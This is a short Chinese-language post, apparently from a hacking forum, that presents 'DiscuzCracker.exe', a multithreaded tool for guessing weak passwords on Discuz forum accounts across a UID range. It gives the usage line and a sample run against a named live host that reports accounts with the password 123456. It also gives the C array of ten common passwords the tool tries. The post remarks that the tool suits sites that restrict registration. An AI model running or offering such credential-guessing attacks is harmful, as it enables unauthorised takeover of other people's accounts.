使用方法如下,
QUOTE:
D:\temp>DiscuzCracker.exe
Codz by: Envymask@ph4nt0m.net
Usage: DiscuzCracker.exe <host> <port> <path> <start uid> <end uid> <max thread>
D:\temp>DiscuzCracker.exe www.discuz.net 80 / 68840 68862 50
UID = 68842 , Password = 123456
UID = 68854 , Password = 123456
UID = 68851 , Password = 123456
End process!
D:\temp>
----------------------------------------------------------------
只能扫弱口令,没什么大用处。对一些限制注册会员的网站有点用,比如××网站
static char psw[10][10] =
{
{"123456"},
{"12345678"},
{"112233"},
{"778899"},
{"888888"},
{"abc123"},
{"qwerty"},
{"poiuyt"},
{"asdfgh"},
{"111111"}
};